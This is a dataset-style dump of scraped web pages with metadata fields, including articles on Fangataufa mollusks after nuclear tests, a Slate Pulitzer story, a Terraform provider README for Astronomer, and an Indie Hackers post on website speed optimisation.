1. To provide an example of this, `npm` introduced `npm-shrinkwrap.json` and later `package-lock.json` files to lock down the entire dependency tree of a project.↩︎
2. No tool *I'm* aware of, that is.↩︎
3. Nix has plenty of shortcomings though, and there are definitely ways to mess up a reproducible build by relying on e.g. the file system or hardcoded paths.↩︎
4. By "free" I'm not trying to undermine the amount of effort and hard work of developers, as well as the cost and computing power required to provide a much appreciated, fully-populated binary cache.↩︎
5. `stack` doesn't market itself as a package manager, but that's beside the point.↩︎
6. See: https://github.com/NixOS/nixpkgs/blob/master/pkgs/top-level/haskell-packages.nix↩︎
7. Linked to the commit at the time of writing. `master` might move away from this design at a later time.↩︎
8. I'm hoping I'll be able to convince them how useful `Nix` is.↩︎
369,502 | http://codesnakes.blogspot.com/2008/11/python-comes-to-netbeans-today.html | Python comes to Netbeans today. | Alley | ## Tuesday, November 18, 2008
### Python comes to Netbeans today.
The time has come. Python support is available for Netbeans.
Download it, Have fun with it.
http://download.netbeans.org/netbeans/6.5/python/ea/
Now I need to look forward to version 7 and getting it final.
I will create a video developing a django project with Netbeans shortly
Thanks for all your support,
Allan
## 5 comments:
yeahh very nicee :D
congratulations again
cant wait to see that django video ;)
why python came after ruby I am not sure
excelent work, is there a plugin for django? where i can get it?
thanks for sharing this site. there are various kinds of ebooks available from here
http://feboook.blogspot.com
Post a Comment | true | true | true | The time has come. Python support is available for Netbeans. Download it, Have fun with it. http://download.netbeans.org/netbeans/6.5/python... | 2024-10-12 00:00:00 | 2008-11-18 00:00:00 | null | blogspot.com | codesnakes.blogspot.com | null | null |
10,274,502 | http://www.atlasobscura.com/articles/how-the-miracle-mollusks-of-fangataufa-came-back-after-a-nuclear-blast | How the Miracle Mollusks of Fangataufa Came Back After a Nuclear Blast | Damaris Colhoun | # How the Miracle Mollusks of Fangataufa Came Back After a Nuclear Blast
In the 1960s and 70s, France conducted 193 nuclear tests in French Polynesia, transforming this stretch of paradise into a field of blooming mushroom clouds.
The largest of these blasts occurred in 1968, when the French government detonated a hydrogen bomb on the Fangataufa atoll, a small, enclosed coral reef that forms a lagoon, almost like a bathtub, in the middle of the ocean. Sacrificed at the altar of global security, at the peak of Cold War paranoia, the reef was singed to a crisp.
“This was a much bigger blast than the others and it was done at low tide,” says Pierre Legendre, a statistical ecologist at the University of Montreal who has been collecting and analyzing data on Fangataufa since 1997. This meant that most of the vegetation was incinerated and “virtually every mollusk was fried.”
Fangataufa and other nearby atolls were selected for the testing because they were so remote, but the radioactive fallout traveled further than expected. According to recently declassified documents, the tests exposed Tahiti to 500 times the maximum level of radiation, and also affected Bora Bora, an island that’s popular with honeymooners. Forty-five years later, Polynesia suffers from a high incidence of thyroid cancer and leukemia, and thousands of veterans and civilians are still battling for compensation over health issues.
In light of this toxic seepage, it seems that an epicenter like Fangataufa should have been obliterated, or least remain a dead zone. And yet the opposite is true. After surveying the atoll for more than 30 years, scientist Bernard Salvat, who later hired Legendre to analyze his findings, say that its mosses and plants have returned. Even more remarkable is that the mollusks who were fried on its rocky perimeter back in 1968—mollusks that Salvat has been studying since before the tests occurred—have also made something of a comeback.
The resurgence of the mollusks is the subject of Salvat and Legendre’s newly published study. The first of its kind to ever appear in public scientific literature, the paper analyzes 30 years of data that Savat collected from the hydrogen-blasted rocks of Fangataufa, using Legendre’s statistical methods. And it seeks to answer one of the fundamental questions of modern life: what happens after nuclear annihilation? How does nature respond? If it comes back, will it be different, and how?
The answer, say Salvat and Legendre, doesn’t just lie with fate, or the strength of a species, or natural design. It boils down to something more random. If the resurgence of the mollusks was a miracle, it was a miracle of chance.
The story of the mollusks begins far from the atolls of Polynesia, in a school of practical studies in Paris, where Savat was teaching oceanography back in 1966. The young researcher had already made a name for himself as one of the few researchers in the nation to have studied at New Caledonia, home of some of the world’s largest enclosed reefs. Savat had also become friendly with the director of the Museum of Natural History, who worked just down the street, and he was working with the Direction des Centres d’Experimentation Nucleaires (DIRCEN), established to administer nuclear testing.
So when one of the DIRCEN committees began casting about for a researcher to do surveys on one enclosed reef in French Polynesia that would soon be used for nuclear testing, Savat was the obvious choice. Along with two other researchers (one who studied fish, another who studied coral), Savat was tapped to survey Fangataufa’s mollusks, before and after the blasts.
Savat immediately saw the offer for what it was: a rare opportunity to study primary succession—that is, what happens ecologically and biologically in the wake of total destruction. It’s a subject most scientists don’t get to study, because it’s hard to create total destruction under experimental conditions.
“I can’t go to the funding agency here in Canada and say, ‘I’m going to destroy the vegetation for the animals on an island, especially with an atomic bomb, in order to study succession,’” Legendre says. “They would reject my grant, and they would be right, because it would be immoral. So Bernard knew he had the chance to study what would be impossible in normal scientific contexts. This makes our data unique in the world.”
Savat’s expeditions to Fangataufa began in 1967. He returned again in 1968 and 1970, and then again in 1972, after the testing on Fangataufa was complete. He fixed rope ladders to the reefs so he could anchor himself during dives. He explored the atoll and its neighbors in a nimble inflatable boat. At some point, the other two researchers abandoned their projects, after finding that much of the fish and coral had been protected from the blast by the water, making it difficult to study their recovery in any concrete way.
The mollusks, however, made excellent subjects. Unlike fish, they are slow moving, easy to identify, and can live in the shallowest waters, making them easy to study. They also have relatively long lifespans—a mollusk lives up to ten years—so the generational turnover in any given spot is relatively low. All of these characteristics made it easier to observe what happened to them after the blasts.
By 1997, Savat had conducted eight field surveys on the reef, at which point he hired Legendre to analyze his data.
The mollusks’ resurgence, their research shows, happened surprisingly quickly. As early as 1972, mollusks had begun to cluster along the rocks, recolonizing the tide pools and upper reaches of the reef. To the untrained eye, it looked as though the same populations of mollusks were coming back. But they were different than before.
Mollusks reproduce by sending their larvae out into the ocean, where they ride the waves and currents for up to thousands of miles, like a scene from “Finding Nemo.” Most of these larvae get eaten by fish and other creatures, but the lucky ones will eventually run into an island, or a reef. As soon as they make contact, they stick out their toes and attach.
This means that the new mollusks of Fangataufa didn’t rise up from the nuclear ashes, like mini shelled phoenixes. Instead, they came by way of waves, drifting from other islands and reefs that may have been thousands of miles away. Unlike the animals of Chernobyl, which were affected by the radiation for generations, the mollusk larvae were genetically fresh.
Many were also different species than the ones before the tests. And this is where the study gets controversial. For years, most ecologists believed that species were controlled exclusively by environmental conditions—in other words, a species lives where the environmental conditions suit them best. Ecologists call this species sorting, and it was the dominant theoretical paradigm when Legendre began his career.
Then in 2001, an ecologist named Stephen Hubbell, whose specialty was tropical forests, hypothesized that where a species settles isn’t determined only by environmental conditions—in fact, Hubbell said it was much more random than that. Citing ideas like “random drift,” and suggesting that every species takes a “random walk” to determine where it lives, Hubbell called this hypothesis the unified neutral theory of biodiversity.
Legendre helped explain. “Imagine how the cloud transmits data to your computer. It’s about the same with the neutral theory. There are organisms in the cloud and some of them settle in the area that you are studying. Some may be happy there, some may be marginally happy there, and others don’t settle there at all. So there is a big random component to the process.”
Hubbell’s theory has been heavily debated, with ecologists arguing that not every species has an equal chance of colonizing. And even Hubbell was skeptical of Savat and Legendre’s results: “On the face of it, certainly [the results] are consistent with it, but it doesn’t in my opinion prove it. It isn’t a slam dunk,” he told *Science Magazine.*
Still, the mollusks of Fangataufa offer compelling evidence that their arrival was a matter of chance. After sampling three different portions of the reef, Savat and Legendre found that only three out of 36 species of mollusks were the same as the ones that had been there before the blasts. Meanwhile, on the other two portions of the reef, the composition of species had changed completely, and were also completely different from each other.
“Over the course of many years of surveys, we found the mix of species slowly changed,” Legendre says. “The mollusks that were there at the beginning, lived about 10 years, and were then replaced by new larvae coming in from the ocean.” It’s a process, then, that will continue to occur, as long as Fangataufa remains and there are mollusks around to run into it.
Legendre’s observation seems like “random drift” in action. And the fact that some of the mollusks were eking out a living in sub-ideal conditions seems to support that idea that not every species gets to live in a place that suits them best. Some of the plant-eating mollusks, for instance, had colonized a higher portion of the reef that was especially harsh and dry. Here, they spent three weeks of every month surviving off what little bit of water they had captured in their shells, while they waited for the next full moon to usher in the tide.
If the story behind these mollusks is starting to sound more existential than miraculous, Legendre might agree: “They settled in that way by chance when they encountered the hard substrate,” he says of the mollusks high on the reef. “It’s not ideal, but of course it is better for them than just floating in the ocean, where they would be eaten by the next fish that comes along.”
Follow us on Twitter Like us on Facebook | true | true | true | In the 1960s and 70s, France conducted 193 nuclear tests in French Polynesia, transforming this stretch of paradise into a field of blooming mushroom clouds. | 2024-10-12 00:00:00 | 2015-09-24 00:00:00 | article | atlasobscura.com | Atlas Obscura | null | null |
7,154,591 | http://www.foreignpolicy.com/articles/2014/01/28/oil_pirates_and_the_mystery_ship | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
18,185,238 | https://montel.io/fear-of-failure/ | Why I'm scared of failure · Montel.io | null | After executing on my first projects, I realized why I’m afraid of failure.
## I actually fear reality
When you are dreaming about your project, everything always feels right. Sure there is some work involved, but in the end, the result is stunning. It feels good to think about your project because you picture yourself in your dream.
When you think about making anything: a blog, a Youtube channel, a startup, a book, a song, it’s like Schrödinger’s cat.
If you don’t open the box, the cat is not dead yet. Before you ship your project, there is still this possibility to reach your dream.
When you execute, you open the box on your dream. You find out how your cat looks. And it hurts because it’s never as beautiful as you imagined. The cat is somewhat ugly and sick compared to your dream cat.
It doesn’t hurt because the cat is dead. It hurts because you have a proof that you will never see your dream cat in reality.
When I am done writing this article, it will never look as moving and enlightened as I had imagined it when I first opened my text editor.
## It challenges my ego
When you realize you will never be able to realize your dream, it challenges how you see yourself. Each setback questions your identity, and your future.
In May I was coding the first lines of Threadhunt from a hotel room in Ubud, Bali. It was one of my first attempts at coding a side project in Node. I was struggling to setup login and authentication and wasted the whole afternoon looking for an answer, and I didn’t find it.
So I was feeling completely down: I can’t even make a fucking login! And I’m even contemplating the idea of making money one day from this side project? I’m a crappy developer and will never make anything significant! My life is probably going to end up miserable at some point.
The problem is to extrapolate the short term setback into a long term vision.
Here is how it looks:
When you’re in the middle of a dip you extrapolate and think about what it implies on the long term.
Segregate your project from yourself. Refuse to let your emotions challenge your identity
## How am I supposed to care less about what I do all the day?
I put all my weekend in this project, how am I supposed to make it secondary?
My take is to view it as a quest.
When you climb a mountain, you don’t really care about each individual step. Of course it’s better if you don’t trip, but the important thing is to get to the summit.
View your work as a long term search for quality.
You pulled out a crappy project. It’s ok, you just tripped on the way to the summit.
Don’t put too much importance in a single project.
When projects succeed or fail, they are just a source of feedback for your long term quest. How did you improve during this project?
For example if you’re a writer, your quest is the ability to convey emotions and meaning through words. If you’re a developer, your quest is the skill to make machines work for you efficiently.
When a single project doesn’t work out, think of it a part of the process, not as an event.
## How to remove ego from this quest?
I think you need to find another reason than yourself for this quest.
I feel when we are empty or don’t know what to do, we fill the void by distractions or ego. When you have a setback and you don’t have a framework to explain it, you fallback to your ego. You think you’re special and everything is related to you. When you have ambition and dreams of success, if you don’t know the why, you justify it by ego. You begin to think that you deserve it, that you are an over achiever, all that BS.
So what I suggest is to find another reason for your quest, that is not related to you.
As an author your mission is important because you change how people think, and you help them make better choices.
As a developer you make machines work instead of humans, so it’s about liberating people from boring work.
I’ll let you know how this works out for me. | true | true | true | After executing on my first projects, I realized why I’m afraid of failure. I actually fear reality When you are dreaming about your project, everything a | 2024-10-12 00:00:00 | 2018-10-10 00:00:00 | /extrapolate-the-dip.png | article | montel.io | Montel.io | null | null |
10,888,290 | http://victorsdiaz.com/testing-asp-net-mvc-view/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
12,618,540 | http://qz.com/797903/japanese-politicians-are-experiencing-pregnancy-to-urge-dads-to-help-out-at-home/ | Japan’s male politicians are experiencing pregnancy to urge dads to do more housework | Siyi Chen | In Japan, women do about five times as much housework as men. To encourage Japan’s salarymen to help out at home, the Kyushu Yamaguchi Work Life Promotion Campaign created a video that showed three male governors in Japan experiencing a day in the life of a pregnant woman. In the video, the politicians strap on a 16-pound vest to simulate pregnancy. Very quickly, they learn how even simple household tasks can be a major pain when carrying around that extra weight. | true | true | true | It's intended to promote more equality at home. | 2024-10-12 00:00:00 | 2016-10-01 00:00:00 | article | qz.com | Quartz | null | null |
5,260,193 | http://www.drdobbs.com/tdd-is-about-design-not-testing/229218691 | TDD Is About Design, Not Testing | Andrew Binstock; February | # TDD Is About Design, Not Testing
TDD is not a way to more-thoroughly test code, although it might have that result.
To upload an avatar photo, first complete your Disqus profile. | View the list of supported HTML tags you can use to style comments. | Please read our commenting policy.
2,837,264 | http://thenextweb.com/us/2011/08/02/new-york-city-techstars-reality-tv-show-to-air-this-fall-on-bloomberg/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
9,413,925 | http://www.slate.com/blogs/moneybox/2015/04/20/daily_breeze_pulitzer_prize_one_of_the_winners_left_journalism_because_he.html | One of Monday’s Pulitzer Prize Winners Left Journalism Because It Couldn’t Pay His Rent. Now He’s in PR. | Jordan Weissmann | The* Daily Breeze*, a small newspaper in Torrance, California, with just 63,000 subscribers and seven metro reporters, was a surprise winner at today’s Pulitzer Prize ceremony, taking home the local reporting award for its investigation of corruption in a poor school district that brought down an exorbitantly paid superintendent and led to changes in state law.* According to Poynter, the big scoop started with some basic beat reporting, when *Daily Breeze *staffers Rob Kuznia and Rebecca Kimitch “began digging into administrator compensation records at Centinela Valley Union High School District.”
The win is a nice reminder that media types aren’t just paying lip service to an old ideal when they say local newspapers can really make a difference in the world. But it’s also a not-so-nice reminder of just how wretched the business of metro journalism truly is. According to *LA Observed*, Kuznia, whose work on the education beat started the whole effort, has apparently left the industry in order to actually support himself. He’s now in public relations.
We should note that Kuznia left the Breeze and journalism last year and is currently a publicist in the communications department of USC Shoah Foundation. I spoke with him this afternoon and he admitted to a twinge of regret at no longer being a journalist, but he said it was too difficult to make ends meet at the newspaper while renting in the LA area.
So, if there are any solvent metro newspapers around looking for a very capable reporter, it looks like there’s a stray Pulitzer winner sitting around. Just saying.
** Correction, April 20, 2015: This post originally misspelled Torrance, California.* | true | true | true | The Daily Breeze, a small newspaper in Torrance, California, with just 63,000 subscribers and seven metro reporters, was a surprise winner at today's... | 2024-10-12 00:00:00 | 2015-04-20 00:00:00 | article | slate.com | Slate | null | null |
12,331,469 | http://shiporgetoffthepot.com/summercampmba/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
3,660,982 | http://youknowyoureastartupfounderwhen.com/ | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
1,928,757 | http://blog.tvdeck.com/2010/11/steve-wozniak-talks-about-importance-of.html | null | null | null | false | false | false | null | null | null | null | null | null | null | null | null |
38,808,734 | https://github.com/GK-Consulting/terraform-provider-astronomer | GitHub - GK-Consulting/terraform-provider-astronomer: Lifecycle management for Airflow clusters managed by Astronomer | GK-Consulting | GK Consulting is a DevOps / Infrastructure shop. We think Astronomer is the right choice for a company who doesn't want to deal with the organizational challenges of managing their own Airflow cluster. However, we didn't like the fact we couldn't provision it like all our other infrastructure - via Terraform. We built this provider so that it would benefit our clients and allow us to continue to adhere to best practices. We are committed to maintaining this repository - PRs are welcome.
Astronomer's API isn't out of beta yet but when it comes out of beta, we will bump our provider to v1.0 (along with any necessary changes).
Please drop us a line if you'd like support, or have other IaC / DevOps needs. We would love to connect and see how we can partner together.
- Clone the repository
- Enter the repository directory
- Build the provider using the Go `install` command: `go install`
This provider uses Go modules. Please see the Go documentation for the most up to date information about using Go modules.
To add a new dependency `github.com/author/dependency`
to your Terraform provider:
```
go get github.com/author/dependency
go mod tidy
```
Then commit the changes to `go.mod`
and `go.sum`
.
You will need an Astronomer API token to use this provider. You'll either need to pass this into the provider via the `token` parameter or you'll need to set the `ASTRONOMER_API_TOKEN` environment variable correctly.
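For example (the token value is a placeholder):
```
export ASTRONOMER_API_TOKEN="<your-api-token>"
terraform plan
```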
If you wish to work on the provider, you'll first need Go installed on your machine (see Requirements above).
To compile the provider, run `go install`
. This will build the provider and put the provider binary in the `$GOPATH/bin`
directory.
To generate or update documentation, run `go generate`
.
In order to run the full suite of Acceptance tests, run `make testacc`
.
*Note:* Acceptance tests create real resources, and often cost money to run.
`make testacc` | true | true | true | Lifecycle management for Airflow clusters managed by Astronomer - GK-Consulting/terraform-provider-astronomer | 2024-10-12 00:00:00 | 2023-12-21 00:00:00 | https://opengraph.githubassets.com/a1de86be084253995a6c993da70a0f34792809e3b17c0bafcd495732f8bdd397/GK-Consulting/terraform-provider-astronomer | object | github.com | GitHub | null | null |
24,640,434 | https://www.indiehackers.com/product/indie-hackers/improved-website-speed--MINh-5tcAnVczzqARIT | Improved Website Speed | Courtland Allen | Indie Hackers should be much faster nowadays… at least for some of you!
In the past week, the PageSpeed Insights score for our homepage on mobile jumped from **24** to **78**. On desktop it jumped from **40** to **97**. Not too shabby!
We had similar improvements on post pages, which are just as important (if not more): from **22** to **79** on mobile, and from **57** to **98** on desktop.
The vast majority of the speedup came from two improvements: (1) serving static pages, and (2) optimizing images.
Indie Hackers is a single-page application (SPA) with server-side rendering. When you visit the site, you have to wait a few seconds for the JS to build the single page app in your browser. For some routes we have server-side rendering, so at least you'll see the full page of HTML while the SPA boots up. On others, you just see a random quote to distract you from how slow it is. 😈
However, It turns out that static HTML is all we really need for anonymous visitors. They don't actually need the SPA to boot up. So I wrote some code that lives on the edge nodes of our CDN. It modifies the HTML response to simply strip out our SPA JS. It also strips out lots of JS and CSS that were only used for the SPA, and replaces them with smaller page-specific JS and CSS.
The result is that, for anonymous visitors, the homepage and post pages load almost instantaneously when they're cached in our CDN. They take a second to load when you get a cache miss, but I've set the cache to last for 7 days, so it should be rare for popular posts. I've also got some good cache invalidation going on, where I'll refresh a post page in the cache when it gets new comments, edited, upvoted, etc. This kind of stuff is a pain to code and maintain, but it's necessary for a dynamic site with lots of visitors to pages that change frequently.
Anyway, this was the vast majority of the speed improvement. In the future I'd like to do the same for logged-in users, but that's a bit trickier, since there's a ton of JS in the SPA that deals with logging you in and allowing you to interact with various components (e.g. leaving comments and upvoting things).
"But Courtland, why did you make IH a SPA to begin with?"
Because it was a fun hobby project when I started it, and I didn't know it would get big leave me alone okay jeez.
This was a relatively simple fix, but it took a while. When you upload an avatar to your IH profile, I've got some code that automatically resizes it down to 72x72 pixels. However, I never got around to writing similar code for product and group icons. And if you look at the homepage, it's absolutely littered with lots of these icons, which makes it bright and happy, but also super huge. If you're on a slow mobile connection, the last thing you want is to download 3MB of images every time you visit the site.
So I spent some time optimizing all of these images. First, instead of merely shrinking them to one size, I'm shrinking them to 3 different sizes, and using the smallest possible size wherever I can get away with it. For example, group icons have a 28x28 pixel size for use in the social feeds around the site:
Second, I'm also converting these images to WEBP, which is a better compression algorithm than both JPG and PNG. The homepage still has way too many images, but now they're just a few kilobytes each on average, whereas before they were often dozens or hundreds of kb each.
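The post doesn't say which tools do the resizing and conversion; as an illustration, the same result can be produced with ImageMagick and Google's `cwebp` encoder:
```
# Resize a group icon down to its 28x28 feed size, then encode it as WebP.
convert icon.png -resize 28x28 icon-28.png
cwebp -q 80 icon-28.png -o icon-28.webp
```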
Besides the above, there were a lot of smaller things, too. And my list of potential speed improvements is still super long. But I'm happy enough with the progress so far to move on to other things for a little bit. | true | true | true | Indie Hackers should be much faster nowadays… at least for some of you! In the past week, the PageSpeed Insights score for our homepage on mobile jumped... | 2024-10-12 00:00:00 | 2020-09-29 00:00:00 | https://storage.googleapis.com/indie-hackers.appspot.com/shareable-images/product-updates/-MINh-5tcAnVczzqARIT | article | indiehackers.com | Indie Hackers | null | null |